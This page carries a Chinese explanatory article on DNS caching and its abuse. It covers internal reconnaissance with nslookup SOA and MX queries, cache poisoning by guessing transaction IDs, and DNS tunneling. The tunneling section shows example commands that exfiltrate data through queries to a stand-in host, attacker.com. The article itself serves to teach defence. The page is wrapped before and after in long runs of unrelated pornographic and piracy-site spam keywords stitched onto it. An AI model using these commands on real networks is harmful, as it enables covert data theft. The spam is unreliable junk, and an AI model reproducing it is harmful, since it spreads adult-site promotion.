精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

DNS系統(tǒng)原理及漏洞利用分析(下)

安全 網(wǎng)站安全
DNS技術(shù)已存在了很長時(shí)間,互聯(lián)網(wǎng)上的每臺(tái)計(jì)算機(jī)都依賴它。然而,利用DNS進(jìn)行內(nèi)網(wǎng)探測、劫持流量并創(chuàng)建隱蔽信道竊取數(shù)據(jù),都是DNS服務(wù)可能造成的安全問題。

接上篇《DNS系統(tǒng)原理及漏洞利用分析(上)

四、DNS緩存

如果每次有任何用戶試圖訪問www.dingxinsec.com.cn,都必須向權(quán)限域名服務(wù)器發(fā)起對(duì)該域名的查詢請(qǐng)求,將會(huì)產(chǎn)生大量的網(wǎng)絡(luò)流量!因此,為了使計(jì)算機(jī)不用在每一次訪問某個(gè)域名時(shí)都向DNS服務(wù)器發(fā)起IP查詢請(qǐng)求,計(jì)算機(jī)上通常會(huì)存儲(chǔ)一個(gè)自身的域名-IP映射庫,這個(gè)映射庫被稱為“DNS緩存”。

  • 加快DNS請(qǐng)求響應(yīng)速度
  • 減少DNS請(qǐng)求在互聯(lián)網(wǎng)上占用的帶寬

但是,DNS緩存方法也存在一些問題,包括:

  • DNS信息的變化需要一定的時(shí)間才能傳播開——這意味著,所有DNS服務(wù)器都將其緩存更新為最新的IP數(shù)據(jù)之前,往往需要一段時(shí)間
  • 攻擊者可能利用DNS緩存發(fā)起攻擊

DNS緩存有以下幾種不同的類型:

  • 瀏覽器DNS緩存:目前大多數(shù)瀏覽器均內(nèi)置了DNS緩存功能,使用本地緩存方式實(shí)現(xiàn)DNS解析通常快速且高效。
  • 操作系統(tǒng)(OS)DNS緩存:目前,大多數(shù)用戶計(jì)算機(jī)操作系統(tǒng)均具備DNS客戶端,可用于管理DNS解析和請(qǐng)求。此類DNS緩存也是本地化的,因此速度快且無需占用帶寬。
  • 遞歸解析DNS緩存:每個(gè)DNS遞歸服務(wù)器中都有DNS緩存,用于存儲(chǔ)可向其發(fā)起下一步請(qǐng)求的IP。
  • [[261205]]

五、DNS常見漏洞

  • 用戶內(nèi)部DNS服務(wù)器會(huì)存儲(chǔ)用戶網(wǎng)絡(luò)域中所有服務(wù)器的內(nèi)部域名與IP,并能夠在無需身份認(rèn)證的情況下實(shí)施訪問。這使得DNS成為攻擊者在內(nèi)網(wǎng)探測階段的重要信息來源。
  • DNS緩存信息并非一定與權(quán)限域名服務(wù)器一致,攻擊者有可能篡改DNS緩存,如果用戶內(nèi)網(wǎng)的DNS服務(wù)器被攻擊篡改,則使用該DNS服務(wù)器發(fā)起域名訪問的計(jì)算機(jī)就會(huì)被誘騙到錯(cuò)誤的服務(wù)器。
  • DNS服務(wù)器可能將內(nèi)網(wǎng)的域名查詢從內(nèi)網(wǎng)工作站遞歸轉(zhuǎn)發(fā)至外網(wǎng)服務(wù)器,攻擊者可能利用此行為創(chuàng)建內(nèi)外網(wǎng)之間的“隱通道”來泄露內(nèi)網(wǎng)數(shù)據(jù)。

1. 利用DNS實(shí)施探測

一旦攻擊者穿透防火墻進(jìn)入用戶內(nèi)網(wǎng)并控制某臺(tái)計(jì)算機(jī),就可以利用內(nèi)網(wǎng)的DNS服務(wù)查找重要的服務(wù)器信息,如郵件服務(wù)器、域名服務(wù)器等各類有價(jià)值的信息。如果攻擊者具備足夠的技術(shù)能力,甚至可能利用內(nèi)部DNS服務(wù)器批量發(fā)送用戶網(wǎng)絡(luò)中區(qū)的信息,此類攻擊被稱為“DNS區(qū)傳輸攻擊”。

以下給出了在Windows操作系統(tǒng)環(huán)境中實(shí)現(xiàn)該攻擊的流程:

  • 打開命令提示符(ctrl+ esc ➡️輸入字母“cmd” ➡️回車)
  • 輸入“ipconfig”,將看到當(dāng)前計(jì)算機(jī)所在的域名、IP地址以及許多其他信息(后續(xù)命令中將會(huì)使用)
  • 鍵入“nslookup[IP]”,將看到正在響應(yīng)請(qǐng)求的DNS服務(wù)器名稱,如果名稱已知,則會(huì)顯示列出名稱和IP地址的DNS記錄
  • 鍵入“nslookup-type=soa [當(dāng)前計(jì)算機(jī)所在域名]”, 執(zhí)行此命令將返回當(dāng)前計(jì)算機(jī)的權(quán)限D(zhuǎn)NS服務(wù)器,如果您嘗試滲透網(wǎng)絡(luò),則不會(huì)很方便。
  • 鍵入“nslookup-type=MX [當(dāng)前計(jì)算機(jī)所在域名]”,通過執(zhí)行該命令,攻擊者可以準(zhǔn)確獲知網(wǎng)內(nèi)郵件服務(wù)器的IP信息。

2. 利用DNS實(shí)施流量重定向

當(dāng)用戶嘗試瀏覽到某個(gè)網(wǎng)站時(shí),他們的計(jì)算機(jī)會(huì)在DNS服務(wù)器中查詢?cè)摼W(wǎng)站的IP。如果DNS服務(wù)器中存有該記錄的緩存,則將直接返回該IP。如果沒有,它會(huì)查詢“上游”DNS服務(wù)器,并將結(jié)果中繼給最終用戶,同時(shí)緩存該信息以供下次使用。

在目前已知的攻擊中,攻擊者已經(jīng)能夠偽造DNS響應(yīng)信息,使其看起來像是來自合法的DNS服務(wù)器。要達(dá)到這一目標(biāo),攻擊者可以利用DNS的三個(gè)弱點(diǎn):

  • DNS對(duì)來自上游服務(wù)器的響應(yīng)僅執(zhí)行非常弱的認(rèn)證。響應(yīng)信息只需包含正確的事務(wù)ID(一個(gè)16位二進(jìn)制數(shù)字(0-65536))。事實(shí)證明,要猜出正確的事務(wù)ID,技術(shù)難度并不大。
  • DNS服務(wù)器接受同時(shí)響應(yīng)多個(gè)查詢請(qǐng)求,因此攻擊者能夠同時(shí)對(duì)事務(wù)ID實(shí)施多次猜測(與暴力破解密碼思路類似)。
  • DNS使用的IP連接很容易被偽造。這意味著攻擊者可以從一臺(tái)計(jì)算機(jī)向DNS服務(wù)器發(fā)送流量,使其看起來像來自另一臺(tái)計(jì)算機(jī),例如另一臺(tái)真實(shí)有效的DNS服務(wù)器。容易被偽造的IP連接類型并不多,不幸的是,DNS恰好是其中之一。

一旦攻擊者成功偽造了DNS響應(yīng)消息,則其可以實(shí)現(xiàn)篡改接收端DNS服務(wù)器的緩存。以下就以一個(gè)典型的場景說明這一攻擊行為可能造成的嚴(yán)重后果:

假設(shè)攻擊者了解到用戶單位使用外部應(yīng)用程序來處理經(jīng)費(fèi)等重要事務(wù)。如果攻擊者篡改了用戶單位DNS服務(wù)器的相關(guān)記錄,則能夠?qū)⒂脩粽T騙至攻擊者偽造的服務(wù)器,誘騙用戶在攻擊者偽造的登陸頁面上錄入其賬號(hào)及口令信息。

更有耐心的攻擊者還可能將真實(shí)流量轉(zhuǎn)發(fā)給真實(shí)的服務(wù)器(充當(dāng)“中間人”),因此用戶就不會(huì)發(fā)現(xiàn)攻擊正在發(fā)生。獲取用戶的身份信息后,攻擊者可以在其他相關(guān)系統(tǒng)上嘗試使用這些身份信息,或者直接出售這些信息。

3. 利用DNS構(gòu)建隱通道

假設(shè)攻擊者已經(jīng)設(shè)法進(jìn)入了用戶單位網(wǎng)絡(luò),控制了一臺(tái)內(nèi)網(wǎng)計(jì)算機(jī),并且已經(jīng)找到了其想要竊取的關(guān)鍵數(shù)據(jù)。如何在不留任何痕跡的情況下將數(shù)據(jù)傳輸?shù)骄W(wǎng)外?攻擊者可能使用一種被稱為“DNS隧道”的技術(shù)來實(shí)現(xiàn)。通常的做法如下:

(1)攻擊者在互聯(lián)網(wǎng)上設(shè)置一個(gè)DNS域(如attacker.com),并創(chuàng)建一個(gè)權(quán)限域名服務(wù)器

(2)在被攻擊者控制的主機(jī)上,攻擊者可以將數(shù)據(jù)分解為小段并將其插入到一系列DNS查詢中,如下所示:

  • nslookup My1secret1.attacker.com
  • nslookup is1that1I1know.attacker.com
  • nsllookup your1data.attacker.com

(3)用戶單位的DNS服務(wù)器將接收這些請(qǐng)求,并將這些請(qǐng)求轉(zhuǎn)發(fā)回attacker.com的權(quán)限域名服務(wù)器。攻擊者在其權(quán)限域名服務(wù)器接收到上述流量后,則可以運(yùn)行程序以提取查詢信息的第一部分(.attacker.com前的內(nèi)容)并將其重新組合,從而將用戶網(wǎng)內(nèi)的數(shù)據(jù)不留痕跡地傳輸?shù)骄W(wǎng)外(此例中傳輸?shù)臄?shù)據(jù)是“My secret is that I know your data.”)。而用戶單位可能永遠(yuǎn)不會(huì)意識(shí)到他們的DNS服務(wù)器被用于泄露自身的數(shù)據(jù)。

六、小結(jié)

DNS技術(shù)已存在了很長時(shí)間,互聯(lián)網(wǎng)上的每臺(tái)計(jì)算機(jī)都依賴它。然而,利用DNS進(jìn)行內(nèi)網(wǎng)探測、劫持流量并創(chuàng)建隱蔽信道竊取數(shù)據(jù),都是DNS服務(wù)可能造成的安全問題。幸運(yùn)的是,通過監(jiān)控DNS服務(wù)器并應(yīng)用安全數(shù)據(jù)分析,目前已有大量技術(shù)可以檢測并阻止這些攻擊。

 

責(zé)任編輯:趙寧寧 來源: 鼎信信息安全測評(píng)
相關(guān)推薦

2019-02-26 15:15:16

DNS漏洞IP

2016-09-29 14:37:39

ImageMagick漏洞分析

2009-07-06 17:47:44

2011-06-16 13:37:43

2017-12-11 17:10:24

2023-07-26 17:13:38

2013-03-22 10:00:14

2021-02-10 09:33:39

漏洞

2020-10-14 09:44:52

漏洞

2017-08-22 13:45:27

2016-05-17 09:42:16

2017-11-08 10:20:10

2015-03-06 17:02:51

2021-08-09 11:15:28

MybatisJavaSpring

2020-10-28 14:58:21

漏洞uTorrent協(xié)議層

2021-11-25 10:36:04

DNS命令Linux

2011-06-16 13:14:18

2009-08-15 10:34:14

安全郵件管理Windows Liv

2009-12-25 11:04:31

Fedora DNS

2023-11-06 18:37:23

虛擬線程編寫
點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號(hào)

色综合视频一区二区三区高清| 香蕉成人久久| 91精品国产综合久久久久久久| 伊人色综合久久天天五月婷| 99久久99热这里只有精品| 欧美亚洲免费在线一区| 9999在线观看| 天天射天天色天天干| 噜噜噜躁狠狠躁狠狠精品视频| 这里精品视频免费| 国产成人亚洲综合a∨猫咪| 日韩av网址在线| 一区二区三区入口| 欧美xxx黑人xxx水蜜桃| 91一区一区三区| 国产欧美日韩高清| 日韩精品一区二区av| 精品视频免费| 日韩成人av在线播放| 亚洲精品成人在线播放| 九色porny自拍视频在线观看| 欧美韩国日本一区| 精品国产一区二区三区四区精华| 亚洲午夜在线观看视频在线| 久久久com| 国产毛片毛片毛片毛片毛片| 亚洲综合不卡| 久久99视频免费| 精品无码国产污污污免费网站| 韩国一区二区三区视频| 色婷婷久久久综合中文字幕| 国产精品88久久久久久妇女| 国产免费永久在线观看| 成人综合婷婷国产精品久久免费| 国产九九精品视频| 激情伊人五月天久久综合| 欧美一区二区三区四区在线观看 | 欧美大尺度做爰床戏| av3级在线| 亚洲男人电影天堂| 亚洲日本无吗高清不卡| 国内精品在线视频| 99久久国产综合精品麻豆| 99久久国产免费免费| 中文字幕一区二区三区波野结 | 自拍偷拍亚洲综合| 日韩一区二区三区资源| 青青操视频在线| 99精品视频中文字幕| 2014亚洲精品| 国产真实夫妇交换视频| 日韩高清电影免费| 精品精品国产高清一毛片一天堂| 一级黄色片在线免费观看| 欧美日韩女优| 欧美影视一区在线| 成人免费无码av| 爱情电影社保片一区| 午夜久久久久久久久久一区二区| 日韩在线视频在线| a毛片在线观看| 亚洲美女偷拍久久| 男人日女人的bb| 日韩av激情| 亚洲成人自拍一区| 亚洲一区二区三区av无码| 老司机精品视频在线| 国产精品aaaa| 中文字幕 亚洲视频| 日韩精品国产欧美| 国产精品美乳在线观看| 中文字幕乱码视频| 久久99精品国产麻豆婷婷| 国产日韩欧美黄色| 国产毛片一区二区三区va在线| 日韩精品 欧美| 九九精品调教| 亚洲成a人v欧美综合天堂下载| 国产精品999视频| 亚洲www.| 91.com在线观看| 91成人在线观看喷潮蘑菇| 国产精品x8x8一区二区| 亚洲人成电影在线播放| 国产黄a三级三级| 国内精品亚洲| free性m.freesex欧美| 亚洲国产欧美在线人成| 韩国日本在线视频| 欧美一级网址| 亚洲国产精品国自产拍av秋霞| 免费中文字幕av| 久久国产综合| 久久免费高清视频| 久久久久久av无码免费看大片| 韩国女主播成人在线| 国产在线精品一区二区三区| 国产高清免费在线播放| 亚洲欧美另类图片小说| 欧美变态另类刺激| 日本一区视频在线观看免费| 亚洲特级黄色片| 精久久久久久久久久久| 国产一区二区黄色| 精品一二三区视频| 欧美黄色一级大片| 欧美一区2区| 蜜臀久久99精品久久久无需会员 | 日韩电影精品| 精品国产百合女同互慰| theav精尽人亡av| 久久福利影院| 欧美国产亚洲精品久久久8v| 成人免费视频毛片| 麻豆精品视频在线| 含羞草久久爱69一区| 日本中文字幕伦在线观看| 午夜精品久久久久久| 午夜免费福利在线| 成人爽a毛片| 精品国产无码一区二区| 亚洲免费激情| 国产精品十八以下禁看| 精品久久人妻av中文字幕| aaa欧美色吧激情视频| 欧美精品aaaa| 国产视频一区在线播放| 韩国一区二区三区美女美女秀| 男女视频在线观看| 亚洲欧美国产77777| 国产视频九色蝌蚪| 国产成人一区二区| 国产精品不卡av| 九九九久久久精品| 欧美亚洲免费高清在线观看| 91精品久久| 国内精品免费视频| 国产欧美视频在线| 亚洲欧美日韩综合| 日韩xxxxxxxxx| 国产精品夜夜爽| 亚洲免费精品视频| 69堂精品视频在线播放| 日韩久久精品电影| 国产一级片久久| 国产精品自拍网站| 国产高清精品软男同| 全球最大av网站久久| 亚洲精品中文字幕女同| 一级黄色免费网站| 波多野结衣在线aⅴ中文字幕不卡| 性欧美18一19内谢| 欧美aaaaaa| 最新国产成人av网站网址麻豆| 日本免费在线观看视频| 91免费在线视频观看| 熟女性饥渴一区二区三区| 卡通动漫国产精品| 午夜免费日韩视频| 四季av日韩精品一区| 亚洲午夜精品在线| 潘金莲一级淫片aaaaa| 色喇叭免费久久综合| 国产欧美在线看| 9色在线观看| 欧美日韩在线不卡| 青青青视频在线播放| 免费一级欧美片在线观看| 日本一区二区三区视频在线播放| 亚洲黄色免费av| 亚洲欧美另类国产| 中文字幕免费观看视频| 国产精品国产三级国产专播品爱网| 中文字幕第80页| 久久中文字幕av| 成人精品一区二区三区| 97影院秋霞午夜在线观看| 7777精品久久久大香线蕉| 日本a级片视频| 成人免费观看视频| 国产91在线免费| 欧洲激情综合| 91在线观看免费观看| 午夜在线激情影院| 日韩精品中文字幕在线播放| 91久久国产综合久久91| 亚洲国产成人私人影院tom| 亚洲性图一区二区| 欧美一区网站| 国产一区精品在线| 亚洲一二三四| 久久福利视频网| 日批视频在线播放| 日本久久一区二区| 精品无码一区二区三区蜜臀| 成人综合在线视频| 熟女少妇精品一区二区| 欧美午夜视频| 日本一区视频在线| 亚洲大奶少妇| 国产成人jvid在线播放| 黄色片免费在线观看| 精品少妇一区二区三区视频免付费| 久久精品视频久久| 久久久久久99久久久精品网站| 91女神在线观看| 18成人免费观看视频| 五月天亚洲综合情| 一区二区三区欧洲区| 97在线观看视频| а√天堂官网中文在线| 亚洲精品成a人在线观看| 最新国产中文字幕| 午夜精品久久久久影视| 99国产精品无码| jlzzjlzz亚洲日本少妇| 亚洲 欧美 日韩系列| 亚洲天堂激情| 吴梦梦av在线| 精品久久影院| 国内精品二区| 国产高清视频一区二区| 国产精品人人做人人爽| 精品极品在线| 欧美美女15p| 国产二区在线播放| 亚洲精品成人久久久| 国产裸体美女永久免费无遮挡| 亚洲大片一区二区三区| 欧洲第一无人区观看| 国产亚洲精品7777| 精品人妻一区二区三区日产| 久久99国产精品免费| 国产综合免费视频| 久久成人在线| 久久黄色片视频| 国产精品av久久久久久麻豆网| 日本一区二区在线视频观看| 白白在线精品| 91免费观看网站| 国产一区 二区| 国产主播在线一区| 高清亚洲高清| 国产精品久久久久77777| 一个人www视频在线免费观看| 欧美精品videosex性欧美| а√天堂资源地址在线下载| 精品国模在线视频| 神马久久高清| 日韩精品黄色网| 无码国产伦一区二区三区视频| 日韩欧美国产麻豆| 亚洲av无码一区二区三区dv| 51午夜精品国产| 国产精品高潮呻吟久久久| 欧美日韩在线播放| 在线观看亚洲一区二区| 午夜在线电影亚洲一区| 久久久精品免费看| 欧美日韩国产限制| 天天干天天干天天干天天| 欧美日韩国内自拍| 天天操中文字幕| 欧美日韩加勒比精品一区| www.国产高清| 欧美日韩免费一区| 久久久久在线视频| 在线精品亚洲一区二区不卡| 久久精品国产成人av| 在线精品视频免费播放| 中文字幕人妻一区二区在线视频| 欧美亚一区二区| 亚洲天堂中文网| 欧美一级欧美三级| 欧美69xxxxx| 伊人男人综合视频网| 日本三级视频在线观看| 欧美成人剧情片在线观看| 色在线视频网| 日韩av毛片网| 日韩大陆av| 国产精品国色综合久久| 亚洲人成网77777色在线播放| 美媛馆国产精品一区二区| 久久神马影院| 波多野结衣av一区二区全免费观看| 99精品国产福利在线观看免费 | 久久久久亚洲| 91.com在线| 日本亚洲免费观看| 久久精品视频在线观看免费| 国产成人一区二区精品非洲| 噜噜噜在线视频| 国产精品久久久久一区二区三区共| 久久国产在线观看| 欧美性极品xxxx做受| 一区二区视频在线免费观看| 日韩精品一区二区三区四区视频 | 国产成人av一区二区三区在线观看| 中文字幕精品视频在线| 国产女人18毛片水真多成人如厕| 中文字幕第69页| 亚洲h在线观看| 自拍偷拍第八页| 国产视频精品一区二区三区| 99中文字幕一区| 国产做受69高潮| 久久精品国产福利| 国产综合第一页| 女人香蕉久久**毛片精品| 免费在线观看的av网站| 国产一区 二区 三区一级| 亚洲第一黄色网址| 国产欧美日韩激情| 中文字幕精品三级久久久| 制服丝袜亚洲色图| 日韩精品系列| 欧美极品少妇xxxxⅹ免费视频| 亚洲精品福利电影| 国产久一道中文一区| 999久久久91| 能在线观看的av网站| 国产999精品久久| 国产黄色录像片| 色吊一区二区三区| 黄色www视频| 美日韩在线视频| 在线看欧美视频| 欧美日韩一区综合| 亚洲第一区色| 日韩精品xxx| 最近日韩中文字幕| 中文字幕永久在线| 日韩精品在线免费播放| 精品精品导航| 91久久精品国产91久久性色| 网曝91综合精品门事件在线| 在线看视频不卡| 蜜臀av一区二区在线免费观看| 久久久午夜精品福利内容| 一二三四社区欧美黄| 中文字幕福利视频| 搡老女人一区二区三区视频tv| 666av成人影院在线观看| 国语精品中文字幕| 亚洲精品色图| 中文在线一区二区三区| 亚洲成精国产精品女| www.天天干.com| 久久国产精品久久精品| 久久久91麻豆精品国产一区| 正义之心1992免费观看全集完整版| 天堂成人免费av电影一区| 魔女鞋交玉足榨精调教| 欧美日在线观看| 极品美乳网红视频免费在线观看 | 免费日韩视频| 91精品人妻一区二区三区蜜桃欧美| 精品福利在线视频| 天天射天天色天天干| 国产91精品视频在线观看| 日韩最新在线| 116极品美女午夜一级| 2023国产精品视频| 久久久成人免费视频| 精品国产乱码久久久久久免费| 久久影院午夜精品| 欧美人与性禽动交精品| 亚洲一区欧美激情| 色欲狠狠躁天天躁无码中文字幕| 欧美中文字幕亚洲一区二区va在线| av大片在线看| 91情侣偷在线精品国产| 国内自拍视频一区二区三区| 在线观看亚洲免费视频| 欧美日韩在线影院| 岛国最新视频免费在线观看| 成人做爽爽免费视频| 激情综合网址| 亚洲午夜久久久久久久久红桃| 91久久精品一区二区三| 黄av在线播放| 国产欧美丝袜| 天堂成人免费av电影一区| 婷婷综合在线视频| 精品国产青草久久久久福利| 制服丝袜专区在线| 婷婷久久青草热一区二区| 国内外成人在线视频| 毛片在线免费视频| 色偷偷av一区二区三区| ady日本映画久久精品一区二区| 欧美日韩亚洲一| 亚洲欧美一区二区视频| 少妇高潮久久久| 国产精品久久99久久| 久久精品久久久| 能免费看av的网站| 欧美一区二区三级| 黄色视屏在线免费观看|